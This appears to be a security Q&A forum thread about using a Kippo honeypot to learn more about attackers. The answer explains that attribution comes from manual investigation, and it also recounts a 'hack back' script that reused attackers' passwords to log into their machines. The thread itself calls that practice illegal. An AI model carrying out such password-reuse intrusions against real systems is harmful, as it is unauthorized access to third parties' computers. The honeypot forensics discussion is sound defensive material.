I've installed a Kippo honeypot on my server and I wanted to know if there are some tools I can launch to collect more information about the cracker.
I want more information to be able to start some forensics stuff.
Asked
Active
Viewed 166 times
1 Answers
1
There is nothing you can "install" to deanonymize an attacker. Once you get the data from Kippo about the IP and connection type, you have as much as you can get unless the attacker reveals more about themselves from their actions. There are tools that you can use to enhance the data a little, but that does not break anonymity.
Most of the investigations that uncover the cracker's identity that I have successfully performed have been the result of the files they try to install or the download locations they use or the passwords they try to use. So, it's all down to a manual investigation. It's not the data that Kippo captures that does it, it's the data that the Kippo data points to that does it. And it's difficult to predict what that might end up being.
... Unless you break the law and hack the hacker back. I know one person who ran a Kippo honeypot and configured a script to use the same password the attacker set for a new account to try to log in to the attacker's machine. He had a 10% success rate (attackers re-using passwords). But, this is illegal in most jurisdictions (unauthorised access).
schroeder
- 123,438
- 55
- 284
- 319